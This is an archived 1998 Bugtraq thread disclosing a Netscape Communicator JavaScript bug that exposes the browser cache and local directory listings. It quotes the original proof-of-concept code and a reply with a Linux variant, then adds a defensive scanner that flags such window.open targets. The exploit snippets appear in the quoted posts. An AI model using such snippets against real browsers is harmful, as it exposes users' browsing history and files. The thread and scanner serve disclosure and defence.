[8349] in bugtraq


Re: Javascript bug in Netscape Communicator 4.5

daemon@ATHENA.MIT.EDU (Ryan Gray)
Fri Oct 30 16:34:35 1998

Date: 	Thu, 29 Oct 1998 17:09:23 -0600
Reply-To: Ryan Gray <tool@SNIPER.ORG>
From: Ryan Gray <tool@SNIPER.ORG>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <19981028182202.13038.qmail@hotmail.com>

Hello,
        Just wanted to add that Netscape Communicator 4.5b2 on Slackware
Linux 3.5 (kernel 2.0.34) is susceptible to this also.  I was able to get
the script to read my cache.  As for the local reading, with a little
modification, it'll do that too.

Example:
the line in George's script that reads local files is -
sl=window.open('wysiwyg://1/file:///c|/');

With just a little change, taking the Linux directory structure into
consideration and adding proper backslash escapes -
sl=window.open('wysiwyg://1/file://\/');

That'll give you a listing of '/' on the local box. (tsk, tsk, tsk)

Regards,
Ryan Gray
http://www.sniper.org - Home of the Afterlife



On Wed, 28 Oct 1998, Georgi Guninski wrote:

> There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95
> (probably others) which allows reading the user's cache (the URLs the user
> has visited, including the info in GET forms). Reading local directory
> contents is also allowed. This info may be sent to an arbitrary host.
> The bug may be exploited by email.
>
> Demonstration is available at:
>  Cache reading: http://www.geocities.com/ResearchTriangle/1711/b4.html
>  Directory reading: http://www.geocities.com/ResearchTriangle/1711/b5.html
>
> The javascript code is:
>
> sl=window.open('wysiwyg://1/about:cache');
> //For Netscape 3.04 remove 'wysiwyg://1/'
> sl2=sl.window.open();
> sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here are some links from your cache:\"; for(i=0;i<5;i++) x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()";
> sl2.location.reload();
>
> Workaround: Disable Javascript.
>
> Regards,
> Georgi Guninski
> http://www.geocities.com/ResearchTriangle/1711/
>

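The two posts above describe one pattern from a defender's point of view: Netscape 4.x accepted `wysiwyg://N/<inner-url>` as a wrapper around another URL, so the scheme that matters for policy is the inner one (`about:`, `file:`), and Ryan's Linux variant shows a backslash-escaped slash (`file://\/`) that has to be normalised before the scheme is read. The scanner below is an added example, not code from either Bugtraq post or from Netscape; it is the kind of check a mail gateway or HTML filter of that era could have run over inbound HTML/JavaScript to flag `window.open()` calls whose literal target is a browser-internal or local resource. All function names and the sample input are constructed for this example.

```javascript
// Added example, not code from either Bugtraq post. Scans HTML/JavaScript
// source for window.open('...') calls that target browser-internal state or
// the local file system, unwrapping Netscape's wysiwyg://N/ prefix first.
// Helper names and the sample input are constructed for this example.

// Schemes that expose browser-internal state (cache, history) or the local
// file system rather than a remote document.
const PRIVILEGED_SCHEMES = new Set(["about", "file"]);

// Normalise a target: fold "\/" escapes to "/", then peel off every
// wysiwyg://N/ wrapper. Returns the innermost URL and whether any wrapper
// was present.
function unwrapTarget(url) {
  let current = url.trim().replace(/\\\//g, "/");
  const wrapper = /^wysiwyg:\/\/\d+\/(.*)$/i;
  let wrapped = false;
  let m;
  while ((m = wrapper.exec(current)) !== null) {
    wrapped = true;
    current = m[1];
  }
  return { inner: current, wrapped };
}

// Scheme of a URL in lower case, or null if it has none (relative URL).
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Classify one window.open() target. Anything reached through a wysiwyg
// wrapper is flagged regardless of the inner scheme, since a remote page has
// no business addressing Netscape's internal scheme at all; a bare about: or
// file: target is flagged as well (Georgi notes 3.04 needs no wrapper).
function classifyTarget(url) {
  const { inner, wrapped } = unwrapTarget(url);
  const scheme = schemeOf(inner);
  return {
    target: url,
    inner,
    scheme,
    wrapped,
    privileged: wrapped || PRIVILEGED_SCHEMES.has(scheme),
  };
}

// Find window.open('...') / window.open("...") calls with a literal first
// argument and return the classifications of those that are privileged.
// Calls with a non-literal or empty argument are not inspected here.
function findPrivilegedWindowOpens(source) {
  const call = /\bwindow\.open\s*\(\s*(['"])(.*?)\1/g;
  const findings = [];
  let m;
  while ((m = call.exec(source)) !== null) {
    const c = classifyTarget(m[2]);
    if (c.privileged) findings.push(c);
  }
  return findings;
}

// Constructed sample: the three targets quoted in the thread, the argument-
// less window.open() from Georgi's script, and one benign remote URL.
const SAMPLE_SOURCE = [
  "sl=window.open('wysiwyg://1/about:cache');",
  "sl=window.open('wysiwyg://1/file:///c|/');",
  "sl=window.open('wysiwyg://1/file://\\/');", // Ryan's Linux form
  "sl2=sl.window.open();",
  "w=window.open('http://www.sniper.org/');",
].join("\n");

console.log(findPrivilegedWindowOpens(SAMPLE_SOURCE));
```

Run with `node` and the three privileged targets are reported with their inner URL and scheme, while the plain `http:` open and the argument-less `window.open()` are not. The check deliberately flags any wysiwyg wrapper rather than only `about:`/`file:` inner URLs, because a remote page has no legitimate reason to name a browser-internal scheme; a real filter would also have to handle non-literal arguments, which a regex over source text cannot resolve.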